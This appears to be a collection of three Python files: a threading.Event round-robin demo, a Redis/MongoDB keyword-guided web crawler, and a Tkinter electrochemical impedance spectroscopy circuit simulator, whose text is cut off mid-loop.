threads.py
|
import threading
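# Demo: three worker threads print in a fixed order by passing a "baton" of
# threading.Event objects: each writer blocks on its own event, prints, then
# sets the event of the next thread in the ring.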
def writer(x, event_for_wait, event_for_set):
for i in range(5):
event_for_wait.wait() # wait for event
event_for_wait.clear() # clean event for future
print(x)
event_for_set.set() # set event for neighbor thread
# Events used to coordinate the threads
e1 = threading.Event()
e2 = threading.Event()
e3 = threading.Event()
# Create the threads
t1 = threading.Thread(target=writer, args=(1, e1, e2))
t2 = threading.Thread(target=writer, args=(2, e2, e3))
t3 = threading.Thread(target=writer, args=('3 \n', e3, e1))
# Start the threads
t1.start()
t2.start()
t3.start()
e3.set()  # choose which thread starts the round-robin (t3 waits on e3)
# join() blocks the main thread until each worker thread has finished,
# so the script does not exit before all the output is printed
t1.join()
t2.join()
t3.join()
|
main.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name:main.py
Author:Johnhay
date:20.9.26
-------------------------------------------------
Change Activity:20.9.26:
-------------------------------------------------
"""
import urllib
import urllib.parse  # urlparse is used in find_candidate_links below
import urllib.request
from urllib.error import HTTPError
import datetime
from http.client import RemoteDisconnected
from retrying import retry
import threading
from bs4 import BeautifulSoup
from configure import config
import json
from loguru import logger
from first_extractor import SFExtractor
import rowblock_extractor
import Levenshtein
import re
import time
import random
import requests
###################################################################################
# Worker thread startup
###################################################################################
class MainThread(threading.Thread):
def __init__(self, thread_num=1, timeout=10.0):
super(MainThread, self).__init__()
self.thread_num = thread_num
self.timeout = timeout
self.stopped = False
def run(self):
def target_func():
logger.info('1.从Redis读URL')
url: dict = get_url_from_redis()
while url:
logger.info('2.访问URL,url={}'.format(url['_id']))
raw_html = get_html_from_url(url)
if raw_html:
logger.info('3.解析URL,url={}'.format(url['_id']))
get_content_from_html(url, raw_html)
logger.info('4.尝试发现相关URL,url={},depth={}'.format(url['_id'], url['depth']))
get_links_from_html(url, raw_html)
logger.info('5.保存URL,url={}'.format(url['_id']))
save_to_mongodb(url)
url: dict = get_url_from_redis()
for i in range(self.thread_num):
subthread = threading.Thread(target=target_func, args=())
            subthread.daemon = True  # daemon subthreads are terminated automatically once the main thread exits
subthread.start()
if not self.stopped:
                subthread.join(self.timeout)  # main thread waits for the subthread up to the timeout
def stop(self):
self.stopped = True
def isStopped(self):
return self.stopped
###################################################################################
# Core functions
###################################################################################
def retry_on_exception(exception):
return isinstance(exception, RemoteDisconnected) or isinstance(exception, ConnectionResetError) or isinstance(
exception, HTTPError)
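# Per the retrying package's semantics: @retry re-invokes download_and_normalize whenever
# retry_on_exception() returns True for the raised exception, sleeping a random interval between
# wait_random_min and wait_random_max milliseconds, and gives up after stop_max_attempt_number
# attempts or stop_max_delay milliseconds.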
@retry(stop_max_delay=config.RETRY_CFG['stop_max_delay'],
stop_max_attempt_number=config.RETRY_CFG['stop_max_attempt_number'],
wait_random_min=config.RETRY_CFG['wait_random_min'], wait_random_max=config.RETRY_CFG['wait_random_max'],
retry_on_exception=retry_on_exception)
def download_and_normalize(url: dict):
    '''
    :param url: {
        '_id': 'http://www.gov.ph',  # unique id
        'url': 'http://www.gov.ph',  # URL address
        'website': 'http://www.gov.ph',  # root website the URL belongs to
        'need_vpn': 0,  # whether a proxy/VPN is needed to reach it
        'category': 0,  # website category
        'threshold': 0.5,  # similarity threshold
        'country': 'zh',  # or 'en'; used together with keyword for similarity scoring
        'name': 'Philippine government',  # URL name
        'keyword': {'zh': [], 'en': []},  # keyword lists
        'depth': 0,  # depth of the URL relative to its website; 0 means the site itself
        'text': "body text",  # empty by default, filled on success
        'log': 'failure log',  # empty by default, filled on failure
        'related_keyword': "",  # comma-separated string of the top-k related keywords
        'url_time': "",  # last-modified time of the page
        'crawl_time': ""  # time the page was crawled
    }
    :return:
    '''
logger.info("url = {}, name = {}".format(url['_id'], url['name']))
proxy_handler = urllib.request.ProxyHandler(config.VNP_PROXIES)
opener = urllib.request.build_opener(proxy_handler)
req = urllib.request.Request(url['_id'], headers=config.HEADERS)
if url['need_vpn']:
resp = opener.open(req)
else:
resp = urllib.request.urlopen(req)
content_charset = resp.info().get_content_charset()
raw_html = resp.read()
if not raw_html:
return ''
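    # Charset guess: decode with each candidate encoding and keep the one whose
    # decode/encode round trip preserves the most bytes of the raw payload.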
best_match = ('', 0)
for charset in ['utf-8', 'gbk', 'big5', 'gb18030']:
try:
unicode_html = raw_html.decode(charset, 'ignore')
guess_html = unicode_html.encode(charset)
if len(guess_html) == len(raw_html):
best_match = (charset, len(guess_html))
break
elif len(guess_html) > best_match[1]:
best_match = (charset, len(guess_html))
except:
pass
if content_charset in ['utf-8', 'gbk', 'big5', 'gb18030']:
raw_html = raw_html.decode(content_charset, 'ignore')
else:
raw_html = raw_html.decode(best_match[0], 'ignore')
return raw_html
def get_url_from_redis():
url_pool = redis_client.keys()
url_pool.remove(config.URL_HISTORY_KEY)
if len(url_pool) == 0:
return None
else:
try:
target_url = random.choice(url_pool)
url = json.loads(redis_client.get(target_url))
            # update the visit history
url_history = redis_client.get(config.URL_HISTORY_KEY)
url_history = url_history + ',' + target_url if url_history != '' else target_url
redis_client.set(config.URL_HISTORY_KEY, url_history)
logger.info('读URL成功!URL = {}'.format(url['_id']))
except Exception as e:
logger.error('读URL失败!URL = {},e = {}'.format(url['_id'], e))
else:
redis_client.delete(target_url)
return url
def get_html_from_url(url: dict):
if url is None: return None
try:
url['crawl_time'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
url['url_time'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
raw_html = download_and_normalize(url)
logger.info('下载URL成功!URL = {}'.format(url['_id']))
except Exception as e:
logger.error('下载URL失败!URL = {},e = {}'.format(url['_id'], e))
        url['log'] = str(e)  # store the error message, not the exception object
        save_to_mongodb(url)  # save the failure record to MongoDB
return None
return raw_html
def get_content_from_html(url: dict, raw_html: str):
'''
    Parse the last-modified time and the main body text.
:param url:
:param raw_html:
:return:
'''
title, content1, keywords, desc = extractor.extract(raw_html)
url['name'] = title
content2 = rowblock_extractor.extract(raw_html)
def choose_content(content1, content2):
if (not content1) and (not content2):
url['log'] = '文本为空!'
return ''
return content1 if len(content1) > len(content2) else content2
url['text'] = choose_content(content1, content2)
if url['need_vpn']:
resp = requests.get(url['_id'], headers=config.HEADERS, proxies=config.VNP_PROXIES)
else:
resp = requests.get(url['_id'], headers=config.HEADERS)
if resp.status_code == 200 and 'Last-Modified' in resp.headers:
url['url_time'] = format_gmt_time(resp.headers['Last-Modified'])
def get_links_from_html(url: dict, raw_html: str):
if url is None: return
if raw_html is None: return
if url['depth'] >= config.DEFAULT_FLAGS['default_depth']:
return
soup = BeautifulSoup(raw_html, 'lxml')
    # all candidate links
candidate_links = find_candidate_links(soup, url['website'])
# logger.debug("candidate_links")
# logger.debug('\n'.join([re.sub(r'\s{2,}', '', str(x)) for x in candidate_links]))
    # links whose similarity to the keywords exceeds the threshold
target_links = find_similar_links(candidate_links, url['keyword'].split(','), url['threshold'])
# logger.debug("similar_links")
# logger.debug(target_links)
for link, link_text, topk_keywords in target_links:
if url['country'] == 'zh':
link_text = re.sub(r'[^\u4e00-\u9fa5]', '', link_text)
elif url['country'] == 'en':
link_text = re.sub(r'[^a-zA-Z]', '', link_text)
if len(link_text) < 2:
continue
        sub_url = {
            '_id': link,  # unique id
            'url': link,  # URL address
            'website': url['website'],  # root website the URL belongs to
            'need_vpn': url['need_vpn'],  # whether a proxy/VPN is needed to reach it
            'category': url['category'],  # website category
            'threshold': url['threshold'],  # similarity threshold
            'country': url['country'],  # or 'en'; used together with keyword for similarity scoring
            'name': link_text,  # URL name, updated when the page is crawled
            'keyword': url['keyword'],  # keyword lists
            'depth': url['depth'] + 1,  # depth of the URL relative to its website; 0 means the site itself
            'text': "",  # empty by default, filled on success
            'log': '',  # empty by default, filled on failure
            'related_keyword': topk_keywords,  # comma-separated string of the top-k related keywords
            'url_time': "",  # last-modified time of the page
            'crawl_time': ""  # time the page was crawled
        }
        # add the new URL to Redis
try:
url_history = redis_client.get(config.URL_HISTORY_KEY)
if sub_url['_id'] not in url_history:
redis_client.set(sub_url['_id'], json.dumps(sub_url))
logger.info('添加新URL成功!url = {}'.format(sub_url['_id']))
except Exception as e:
logger.error('添加新URL失败! url = {},e = {}'.format(sub_url['_id'], e))
def find_candidate_links(soup, website):
all_links = soup.find_all('a')
# logger.debug("all_links")
# logger.debug('\n'.join([re.sub(r'\s{2,}','',str(x)) for x in all_links]))
def extract_domain(url: str):
return urllib.parse.urlparse(url).netloc
def filter_href(link):
try:
href = link['href']
            # URL length
if len(href) > 128:
return False
            # URL format
if re.match(r'^https?:/{2}\w.+$', href):
                # URL belongs to the current domain
domain = extract_domain(website)
cur_domain = extract_domain(href)
if cur_domain != '' and (domain.endswith(cur_domain) or cur_domain.endswith(domain)):
return True
except KeyError as e:
return False
return False
def filter_text(link):
        # filter by link-text length
text = link.text.strip() if link.text != '' else ''
if len(text) < 2:
return False
return True
candidate_links = []
for link in all_links:
if filter_href(link) and filter_text(link):
candidate_links.append(link)
return candidate_links
def find_similar_links(candidate_links: list, keywords: list, threshold: float):
'''
    Compute a similarity score between each link text and every keyword; keep links whose best
    score beats the threshold, together with their top-k keywords.
    :param candidate_links:
    :return: [(link, link_text, topk_keywords), (link, link_text, topk_keywords), ...]
'''
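    # Levenshtein.jaro returns a similarity in [0, 1]; 1.0 means the two strings are identical.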
similar_links = []
def filter(text):
        # if any keyword scores above the threshold, treat the link as similar and return the top-k keywords as a comma-separated string
key_scores = sorted(
dict([(key.strip(), Levenshtein.jaro(text.lower(), key.strip().lower())) for key in keywords]).items(),
key=lambda x: x[1],
reverse=True)
if key_scores[0][1] > config.DEFAULT_FLAGS['default_threshold']:
return ','.join([key.strip() for key, _ in key_scores][:config.DEFAULT_FLAGS['default_topk']])
return ''
for link in candidate_links:
url = link['href'].strip()
text = link.text.strip()
related_keywords = filter(text)
if related_keywords != '':
similar_links.append((url, text, related_keywords))
return similar_links
def format_gmt_time(gmt_time):
GMT_FORMAT = '%a, %d %b %Y %H:%M:%S GMT'
try:
dt = datetime.datetime.strptime(gmt_time, GMT_FORMAT) + datetime.timedelta(hours=8)
except Exception:
return time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
return "{}-{}-{} {}:{}:{}".format(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second)
def save_to_mongodb(url: dict):
try:
id = url['_id']
        mongo_client.replace_one({'_id': id}, url, upsert=True)  # update or insert (upsert)
logger.info("保存结果成功!url = {}".format(url['_id']))
except Exception as e:
logger.error('保存结果出错!url = {}, e = {}'.format(id, e))
if __name__ == '__main__':
mongo_client = config.mongo_client
redis_client = config.redis_client
extractor = SFExtractor()
logger.add(config.LOG_FILE, rotation="500 MB", encoding='utf-8')
start_timestamp = time.mktime(time.strptime(config.TIME_CFG['start_date'], "%Y-%m-%d %H:%M:%S"))
end_timestamp = time.mktime(time.strptime(config.TIME_CFG['end_date'], "%Y-%m-%d %H:%M:%S"))
    thread = MainThread(thread_num=config.DEFAULT_FLAGS['default_thread'])  # number of worker threads
thread.start()
while True:
time.sleep(1)
if time.time() >= start_timestamp and time.time() <= end_timestamp:
pass
else:
thread.stop()
logger.info("运行时间到!,主程序结束!")
break
|
EIS_Simulator_final.py
|
from tkinter import *
from PIL import Image, ImageTk
from functools import partial
#import modules for opening and formatting windows and image processing
# pathway to image folder (note:change to your device path, if on Windows change backslashes to forward)
img_folder_path="F:/Python images for EIS"
imgfolder_4e = img_folder_path + "/4element/"
imgfolder_3e = img_folder_path + "/3element/"
imgfolder_2e = img_folder_path + "/2element/"
imgfolder_1e = img_folder_path + "/1element/"
# define dictionaries for storing images
img_dict_4e = {}
img_dict_3e = {}
img_dict_2e = {}
img_dict_1e = {}
# for loops to fill process/resize images with PIL and fill individual (1-4) image Dictionaries
for x in range(1, 11):
full_img_path = imgfolder_4e + f'pic4_{x}.png'
img_processed = Image.open(full_img_path)
    img_processed = img_processed.resize((145, 125), Image.LANCZOS)  # LANCZOS is the same filter as the removed ANTIALIAS constant
img_dict_4e[f'img4_{x}'] = img_processed
for x in range(1, 5):
full_img_path = imgfolder_3e + f'pic3_{x}.png'
img_processed = Image.open(full_img_path)
    img_processed = img_processed.resize((145, 125), Image.LANCZOS)
img_dict_3e[f'img3_{x}'] = img_processed
for x in range(1, 3):
full_img_path = imgfolder_2e + f'pic2_{x}.png'
img_processed = Image.open(full_img_path)
    img_processed = img_processed.resize((145, 125), Image.LANCZOS)
img_dict_2e[f'img2_{x}'] = img_processed
for x in range(1, 2):
full_img_path = imgfolder_1e + f'pic1_{x}.png'
img_processed = Image.open(full_img_path)
    img_processed = img_processed.resize((145, 125), Image.LANCZOS)
img_dict_1e[f'img1_{x}'] = img_processed
# Construct combined image dictionary out of separate dictionaries
master_img_dict = {}
for key in img_dict_4e:
master_img_dict[key] = img_dict_4e[key]
for key in img_dict_3e:
master_img_dict[key] = img_dict_3e[key]
for key in img_dict_2e:
master_img_dict[key] = img_dict_2e[key]
for key in img_dict_1e:
master_img_dict[key] = img_dict_1e[key]
# Establish default string variable for Circuit Choice
chosen_circuit = "None"
# Define function to bring pop up windows to forefront
def window_tofront(window):
window.lift()
window.attributes('-topmost', True)
window.after_idle(window.attributes, '-topmost', False)
# function to open picture/button window of 4 element choices
# window text and size/frame setup
def four_element_choice():
four_window = Tk()
four_window.geometry("1000x500")
four_window.title("Circuit configuration Options")
label1 = Label(four_window, text="Choose from the possible circuit configurations.\nYou will be able to specify the identity of each element afterwards:", padx=10, pady=10)
label1.pack()
frame = LabelFrame(four_window, padx=50, pady=50)
frame.pack()
    # Define function for the button-push event (set the chosen_circuit variable from the argument and close the window)
def buttonpush(a):
global chosen_circuit
chosen_circuit = a
four_window.destroy()
    # translate values in img_dict_4e into a b_img_dict dictionary using ImageTk.PhotoImage so they are usable in Tkinter
    # the for loop runs through the circuit images in b_img_dict, creating a button in the window for each image in the dictionary
    # a partial function (a function with a predetermined argument) is assigned to each button, and the dictionary key for the button's image is given
    # as the buttonpush argument, so each button call sets chosen_circuit to its image key name
    # if/elif statements format button placement on the grid
b_img_dict = {}
buttonnum = 1
for key in img_dict_4e:
b_img_dict[key] = ImageTk.PhotoImage(img_dict_4e[key])
for key in b_img_dict:
if buttonnum < 3:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=1, row=buttonnum, padx=10, pady=10)
buttonnum = buttonnum + 1
elif buttonnum < 5:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=2, row=buttonnum - 2, padx=10, pady=10)
buttonnum = buttonnum + 1
elif buttonnum < 7:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=3, row=buttonnum - 4, padx=10, pady=10)
buttonnum = buttonnum + 1
elif buttonnum < 9:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=4, row=buttonnum - 6, padx=10, pady=10)
buttonnum = buttonnum + 1
elif buttonnum < 11:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=5, row=buttonnum - 8, padx=10, pady=10)
buttonnum = buttonnum + 1
# call window to front, mainloop window (to keep it open)
window_tofront(four_window)
four_window.mainloop()
# establish the chosen circuit as the return value for the window calling function
return chosen_circuit
# Function to open window for 3 element choices. Same logic as four_element_choice but with a different button grid layout
def three_element_choice():
three_window = Tk()
three_window.geometry("500x500")
three_window.title("Circuit configuration Options")
label1 = Label(three_window, text="Choose from the possible circuit configurations.\nYou will be able to specify the identity of each element afterwards:", padx=10, pady=10)
label1.pack()
frame = LabelFrame(three_window, padx=50, pady=50)
frame.pack()
def buttonpush(a):
global chosen_circuit
chosen_circuit = a
three_window.destroy()
b_img_dict = {}
buttonnum = 1
for key in img_dict_3e:
b_img_dict[key] = ImageTk.PhotoImage(img_dict_3e[key])
for key in b_img_dict:
if buttonnum < 3:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=1, row=buttonnum, padx=10, pady=10)
buttonnum = buttonnum + 1
else:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=2, row=buttonnum - 2, padx=10, pady=10)
buttonnum = buttonnum + 1
window_tofront(three_window)
three_window.mainloop()
return chosen_circuit
# Function to open window for 2 element choices. Same logic with altered button grid layout
def two_element_choice():
two_window = Tk()
two_window.geometry("500x350")
two_window.title("Circuit configuration Options")
label1 = Label(two_window, text="Choose from the possible circuit configurations.\nYou will be able to specify the identity of each element afterwards:", padx=10, pady=10)
label1.pack()
frame = LabelFrame(two_window, padx=50, pady=50)
frame.pack()
def buttonpush(a):
global chosen_circuit
chosen_circuit = a
two_window.destroy()
b_img_dict = {}
buttonnum = 1
for key in img_dict_2e:
b_img_dict[key] = ImageTk.PhotoImage(img_dict_2e[key])
for key in b_img_dict:
if buttonnum < 2:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=1, row=buttonnum, padx=10, pady=10)
buttonnum = buttonnum + 1
else:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=2, row=buttonnum - 1, padx=10, pady=10)
buttonnum = buttonnum + 1
window_tofront(two_window)
two_window.mainloop()
return chosen_circuit
# function to call appropriate window based on integer value (provided by user) and return circuit dictionary image key
# clickable window unnecessary for 1 element (only 1 choice)
def determine_circuit_config(n):
if n == 4:
return four_element_choice()
elif n == 3:
return three_element_choice()
elif n == 2:
return two_element_choice()
elif n == 1:
return "img1_1"
# import modules for mathematical operation
import matplotlib.pyplot as plt
import numpy as np
import cmath as cm
import pandas as pd
###### Introduction screen and number/type of elements are obtained in this block##################
###################################################################################################
print(30 * '-')
print("WELCOME TO EIS SIMULATOR")
print(30 * '-')
print("Ciruit element codes: ")
print("R: Resistance")
print("C: Capacitance")
print("CPE: Constant Phase Element")
print("W: Warburg Impedance")
print(30 * '-')
###########################
## Robust error handling ##
## only accept int 1-4 ##
###########################
## Wait for valid input in while...not ###
is_valid = 0
# obtain number of elements user wishes to simulate. keep asking for a number until user inputs integer from 1-4
# try/except for error handling of float and string inputs, while loop to ensure value 1-4
while not is_valid:
n_elements_str = input('How many elements would you like to simulate? Enter an integer value (1-4) : ')
try:
n_elements = int(n_elements_str)
if n_elements >= 1 and n_elements <= 4:
is_valid = 1 ## set it to 1 to validate input and to terminate the while..not loop
else:
print(str(n_elements) + " is not a valid integer. \nPlease enter an integer value from 1-4.")
except ValueError:
print(str(n_elements_str) + " is not a valid integer. \nPlease enter an integer value from 1-4.")
# Run user picture selection window to determine circuit config
user_choice_img_key = determine_circuit_config(n_elements)
# convert image dictionary key string to be used for circuits dictionary
user_choice_circuits_key = user_choice_img_key[3:]  # drop the leading "img" prefix (e.g. "img4_1" -> "4_1")
# Use PIL to resize users chosen circuit image for reference display # quit program if KeyError: User closed image selection window without picking circuit
try:
    user_choice_img = master_img_dict[user_choice_img_key].resize((290, 250), Image.LANCZOS)
except KeyError:
quit()
# define variable to determine when user is done with data inputs to close reference picture window
user_inputs_done = False
# Open window with circuit reference picture to assist in element assignment
def open_reference_window():
global user_inputs_done
global user_choice_img
reference_window = Tk()
reference_window.geometry("500x400")
reference_window.title("Simulated Circuit Configuration")
frame = LabelFrame(reference_window,
text="Below is your chosen circuit for reference as you specify element identities :", padx=50,
pady=50)
frame.pack()
reference_img = ImageTk.PhotoImage(user_choice_img)
label = Label(frame, image=reference_img)
label.pack()
def do_nothing(): # disabling closewindow button (window closes automatically when user finishes inputs)
pass
reference_window.protocol('WM_DELETE_WINDOW', do_nothing)
window_tofront(reference_window)
# continue to update window (showing window onscreen) until user finishes inputs
while not user_inputs_done:
reference_window.update()
# destroy tkinter window so that Tkinter does not continue to reference this window's data later in the program
reference_window.destroy()
# Import threading, create separate thread for pulling up circuit reference window, and start thread
# This allows user input code to continue while the window code runs and loops
import threading
thread_1 = threading.Thread(target=open_reference_window)
thread_1.start()
### obtain type of elements and parameters
# elements types are stored in list
# parameters are stored in params list, with corresponding index as element_types list.
# if more than one parameter is needed to describe an element, i.e. CPE or W, the value stored in params is a nested list with multiple parameters.
#####object element_types specifies the user defined elements, object params has the corresponding parameters in the same index############
###### For example, if element_types[1] is a Warburg impedance, params[1] will be a list [A, D_O, D_R, c_O_bulk, c_R_bulk, n_el] ######
element_types = []
params = []
def check_neg_error(a):  # raise ValueError if the argument is zero or negative
    if a <= 0:
        raise ValueError("value must be positive")
# for loop through element number, this loop addresses and collects parameters for each element 1-4 one at a time
for i in range(1, n_elements + 1):
valid = 0
while not valid: # ensure user input is only allowed element types R, C, CPE, or W
ith_element = input('What is element #' + str(i) + '? ')
if ith_element in ['R', 'C', 'CPE', 'W']:
valid = 1
else:
print(str(
ith_element) + " is not a valid input. \nPlease choose from R. Resistor, C. Capacitance, CPE. Constant Phase Element, W. Warburg Impedance")
element_types.append(ith_element)
valid_values = 0
    while not valid_values:  ## this loop prompts the user for values depending on the element identity, checks them for errors, and if valid appends them to the parameter list and breaks the loop
try:
if ith_element == 'R':
r = float(input("Please specify the resitance in Ohms : "))
check_neg_error(r)
params.append(r)
elif ith_element == 'C':
c = float(input("Please specify the capacitance in F : "))
check_neg_error(c)
params.append(c)
elif ith_element == 'CPE':
ntrue = 0
q = float(input("Please specify the Q parameter in F : "))
check_neg_error(q)
while not ntrue:
n = float(input(
"Please specify the ideality factor n between 0 and 1 : ")) # ensure that the ideality factor is indeed between 0 and 1 or continue asking for it until it is.
if n >= 0 and n <= 1:
ntrue = 1
else:
print(str(n) + " is not between 0 and 1.")
params.append([q, n])
else:
choose_sigma = False
choose_param = False
print(
"Would you like to provide the general Warburg coefficent \u03C3 or more specific parameters (ie. species concentrations, diffusion coefficients etc.)?")
## determine whether user wants to enter warburg coefficient or individual concentration/diffusion parameters
while not choose_param and not choose_sigma:
sigma_or_param = str(input("Enter \'sigma\' or \'parameters\' : "))
if sigma_or_param == "sigma":
choose_sigma = True
elif sigma_or_param == "parameters":
choose_param = True
else:
print("Please enter one of the provided responses.")
if choose_sigma:
sigma_val = float(
input("Please specify the value of the Warburg coefficient \u03C3 in Ohms/\u221asec : "))
check_neg_error(sigma_val)
params.append([sigma_val])
else:
A = float(input("Please specify the area A in cm^2 : "))
check_neg_error(A)
D_O = float(input("Please specify the diffusion coefficient of the oxidized species in cm^2/s : "))
check_neg_error(D_O)
D_R = float(input("Please specify the diffusion coefficient of the reduced species in cm^2/s : "))
check_neg_error(D_R)
c_O_bulk = float(
input("Please specify the bulk concentration of oxidized species in mol/L : ")) / 1000
check_neg_error(c_O_bulk)
c_R_bulk = float(
input("Please specify the bulk concentration of reduced species in mol/L : ")) / 1000
check_neg_error(c_R_bulk)
n_el = int(input("Please specify the number of electrons in the redox reaction: "))
check_neg_error(n_el)
params.append([A, D_O, D_R, c_O_bulk, c_R_bulk, n_el])
valid_values = 1
        except ValueError:  # if a ValueError occurs, valid_values stays 0; the loop prints a message and restarts
print("You have entered an invalid value. Please ensure entered values are positive and numerical.")
lo_hi = 0 # check that the frequency range is correctly specified, low to high, positive, and numerical
pos_freq = 0
nonstr_freq = 0
while not nonstr_freq:
try:
while not lo_hi or not pos_freq:
lo_hi = 0
pos_freq = 0
low_f = float(input("What is the lowest frequency f (in Hz) that you would like to simulate? : "))
high_f = float(input("What is the highest frequency f (in Hz) that you would like to simulate? : "))
if high_f > low_f:
lo_hi = 1
else:
print(
"Your upper frequency is lower than your lowest frequency, please ensure a proper frequency range.")
if low_f > 0 and high_f > 0:
pos_freq = 1
else:
print("Please ensure a proper frequency range with positive values above 0 Hz.")
nonstr_freq = 1
except ValueError:
print("Please ensure you have entered positive numerical values for your frequency range.")
# Alter variable to indicate user is done with data input to close reference picture window
user_inputs_done = True
# create range of frequencies for calculation in increments in logspace
w_input = np.logspace(np.log10(low_f), np.log10(high_f), num=1000)
# multiply each element in the f range by 2pi and append to new list to give list of angular frequencies
w_range = []
for w in w_input:
x = round(2 * np.pi * w, 4)
w_range.append(x)
print(element_types)
print(params)
### Calculating Individual Element Impedances ###
# Able to take a frequency range, and relevant parameters from user input
# Returns an np.array of impedances for each frequency value
# Resistor
# w is array of angular frequencies in rad/s
# R is resistance in ohms
def Z_R(w, R):
Re_Z = np.full(len(w), R)
Im_Z = np.zeros(len(w))
return Re_Z + Im_Z
# Capacitor
# w is array of angular frequencies in rad/s
# C is capacitance in farads
def Z_C(w, C):
x = np.array(w)
Re_Z = np.zeros(len(w))
Im_Z = -1 / (x * C) * 1j
return Re_Z + Im_Z
# Constant phase element
# w is array of angular frequencies in rad/s
# n is a number between 0 and 1
def Z_CPE(w, params):
x = np.array(w)
Q = params[0]
n = params[1]
Re_Z = (1 / (Q * (x ** n))) * cm.cos(cm.pi * n / 2)
Im_Z = (-1 / (Q * (x ** n))) * cm.sin(cm.pi * n / 2) * 1j
return Re_Z + Im_Z
# Warburg impedance
# w is array of angular frequencies in rad/s
# A is electrode area in cm^2
# D_O and D_R are diffusion coefficients for oxidized and reduced species in cm^2/s
# c_O_bulk and c_R_bulk are bulk concentrations for oxidized and reduced species in mol/cm^3
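# With the full parameter set, the Warburg coefficient computed below is
#   sigma = R*T / (n^2 * F^2 * A * sqrt(2)) * (1/(sqrt(D_O) * c_O_bulk) + 1/(sqrt(D_R) * c_R_bulk))
# and Z_W = sigma/sqrt(w) - j*sigma/sqrt(w), which traces the characteristic 45-degree line on a Nyquist plot.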
def Z_W(w, params):
x = np.array(w)
if len(params) == 6:
A = params[0]
D_O = params[1]
D_R = params[2]
c_O_bulk = params[3]
c_R_bulk = params[4]
n = params[5]
R = 8.314 # J/K•mol
F = 96485 # C/mol
T = 298 # K
sigma = (R * T / ((n * F) ** 2 * A * 2 ** 0.5) * ((1 / D_O ** 0.5 / c_O_bulk) + (1 / D_R ** 0.5 / c_R_bulk)))
Re_Z = sigma / x ** 0.5
Im_Z = -sigma / x ** 0.5 * 1j
return Re_Z + Im_Z
else:
Re_Z = params[0] / x ** 0.5
Im_Z = -params[0] / x ** 0.5 * 1j
return Re_Z + Im_Z
### Handling User Input of Element Parameters ###
# Input/circuit dictionary
circuits_dict = {}
# Convert user input parameters into impedance arrays
el_impedance = []
# take inputs and calculate Z for element type.
for i in range(n_elements):
if element_types[i] == 'R':
zi = Z_R(w_range, params[i])
elif element_types[i] == 'C':
zi = Z_C(w_range, params[i])
elif element_types[i] == 'CPE':
zi = Z_CPE(w_range, params[i])
else:
zi = Z_W(w_range, params[i])
el_impedance.append(zi)
# Assigns the calculated impedance to specific elements
if n_elements == 1:
E1 = el_impedance[0]
E2 = 0
E3 = 0
E4 = 0
elements = [E1]
elif n_elements == 2:
E1 = el_impedance[0]
E2 = el_impedance[1]
E3 = 0
E4 = 0
elements = [E1, E2]
elif n_elements == 3:
E1 = el_impedance[0]
E2 = el_impedance[1]
E3 = el_impedance[2]
E4 = 0
elements = [E1, E2, E3]
else:
E1 = el_impedance[0]
E2 = el_impedance[1]
E3 = el_impedance[2]
E4 = el_impedance[3]
elements = [E1, E2, E3, E4]
### Listing Possible Circuit Configurations ###
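# Convention used in the circuit definitions below and resolved recursively by calc_Z():
# a Python list groups impedances in series, a tuple groups them in parallel, and nesting
# expresses sub-circuits.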
# Possible circuits for 4 elements
circuits_4 = [[[E1, E2, E3, E4]],
[[E1, E2, (E3, E4)]],
[[E1, ([E2, E3], E4)]],
[(E4, [E2, E3, E1])],
[([E1, E3], [E2, E4])],
[[(E1, E2), (E3, E4)]],
[([E1, (E2, E3)], E4)],
[[E1, (E2, E3, E4)]],
[([E1, E2], E3, E4)],
[(E1, E2, E3, E4)]]
for count, array in enumerate(circuits_4):
circuits_dict["4_" + str(count + 1)] = circuits_4[count]
# Possible inputs for 3 elements
circuits_3 = [[[E1, E2, E3]],
[[E1, (E2, E3)]],
[([E1, E2], E3)],
[(E1, E2, E3)]]
for count, array in enumerate(circuits_3):
circuits_dict["3_" + str(count + 1)] = circuits_3[count]
# Possible inputs for 2 elements
circuits_2 = [[[E1, E2]],
[(E1, E2)]]
for count, array in enumerate(circuits_2):
circuits_dict["2_" + str(count + 1)] = circuits_2[count]
# Possible inputs for 1 element
circuits_1 = [[E1]]
for count, array in enumerate(circuits_1):
circuits_dict["1_" + str(count + 1)] = circuits_1[count]
### Functions for Calculating Impedance ###
# Function for adding impedances in series
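# Z_total = Z_1 + Z_2 + ...  (element-wise over the frequency array)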
def add_series_Z(elements):
return np.sum(elements, axis=0)
# Function for adding impedances in parallel
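# 1/Z_total = 1/Z_1 + 1/Z_2 + ...  (element-wise over the frequency array)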
def add_parallel_Z(elements):
inv_elements = []
for i in elements:
inv_elements.append(1 / i)
return 1 / (np.sum(inv_elements, axis=0))
# Logic Loop for calculating total impedance
def calc_Z(input_circuit, config):
circuit = input_circuit
# Tuple can't be modified so create a dummy list to store calculations
dummy_circuit = []
# while not all(isinstance(x, np.ndarray) for x in dummy_circuit):
for i, feature in enumerate(circuit):
if isinstance(feature, np.ndarray):
dummy_circuit.append(feature)
elif isinstance(feature, list):
            if all(isinstance(x, np.ndarray) for x in feature):
dummy_circuit.append(add_series_Z(feature))
else:
dummy_circuit.append(calc_Z(feature, "series"))
elif isinstance(feature, tuple):
            if all(isinstance(x, np.ndarray) for x in feature):
dummy_circuit.append(add_parallel_Z(feature))
else:
dummy_circuit.append(calc_Z(feature, "parallel"))
if config == "parallel":
return add_parallel_Z(dummy_circuit)
elif config == "series":
return add_series_Z(dummy_circuit)
### Plotting the Calculated Impedances ###
# Construct Frequency list from angular frequency list
f_range = []
two_pi = round(2 * np.pi, 4)
for _ in range(len(w_range)):
